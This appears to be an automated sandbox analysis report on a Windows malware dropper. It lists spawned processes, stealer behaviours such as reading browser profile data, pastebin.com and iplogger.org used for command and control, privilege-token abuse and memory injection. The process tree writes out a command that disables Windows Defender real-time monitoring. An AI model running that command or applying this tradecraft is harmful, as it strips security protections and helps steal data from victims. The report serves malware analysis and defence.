N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1969586bcbf58493.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1969586bcbf58493.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c06f159e0ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c06f159e0ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-6C6DU.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-6C6DU.tmp\Tue19879c4c0e.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19325eb008c0b950.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c06f159e0ec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-6C6DU.tmp\Tue19879c4c0e.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1969586bcbf58493.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1993b3f72c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c1338f41ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe N/A

Kills process with taskkill

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c78ded4d176ac.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2512 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2512 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2512 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2512 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2512 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2512 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2512 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2284 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
PID 2284 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
PID 2284 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
PID 2284 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
PID 2284 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
PID 2284 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
PID 2284 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
PID 2744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe

"C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

